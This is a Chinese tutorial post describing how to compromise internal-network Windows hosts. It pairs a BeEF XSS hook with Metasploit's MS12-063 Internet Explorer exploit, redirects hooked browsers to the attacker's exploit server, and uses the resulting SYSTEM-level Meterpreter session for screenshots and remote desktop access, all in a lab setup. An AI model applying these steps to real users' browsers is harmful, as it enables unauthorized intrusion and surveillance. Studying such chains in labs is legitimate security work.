1. 程式人生 > >metasploit利用IE漏洞XSS掛馬拿內網主機

metasploit利用IE漏洞XSS掛馬拿內網主機

metasploit內網滲透方面好多方式,這只是科普下xss在內網中的利用。

系統:KALI

用到的工具:beEF+msf

 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

MS12-063 

Automatic
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

用到的beef+msf

先配置下:

[email protected]:~# cd /usr/share/beef-xss/
[email protected]:/usr/share/beef-xss# ls
beef           beef_key.pem  config.yaml  db          Gemfile       modules
beef_cert.pem  bundle        core         extensions  Gemfile.lock

編輯下config.yaml
把metasploit :false改成true

再進入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP  這裡是220.128

再改動下custom   path:

這樣beef已經配置好了。那就執行下metasploit

執行msf後 資料庫連線下,不然上線也會沒有提示的。這裡的pass 就是extensions/metasploit/config.yaml裡面的pass

這樣就沒有什麼問題。我們可以先看一下beef.資料庫只要連上了就不會出現msf的api錯誤的。

進入beef

賬號密碼beef 配置檔案裡面有。beef:beef

那beef已經都OK了。
現在來搞下選擇下要顯示的頁面:

hook.js  執行beef 顯示出來的。
別忘記執行下apache。

我們再進入msf

use exploit/windows/browser/ie_execcommand_uaf

可以自己根據自己的要求來選擇。

show options

port可以自已改。

我用xp+ie7

直接訪問下我們的頁面192.168.220.128/xss/
beef就會顯示出來了。

點選 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)

我們就會看到msf上面已經顯示出來了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷

執行sessions -i

執行sessions -i ID號
可以執行任意命令已經是系統許可權

執行下screenshost

meterpreter > screenshot 
Screenshot saved to: /root/dlsSQBkF.jpeg

就可以看到當前主機的螢幕內容。

也可以rdesktop 遠端連線上去。
引數rdesktop  -f ip -u username -p password
這也是一種xss掛馬拿內網主機。

注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什麼好的方法希望告訴我,我更新在空間,分享給大家。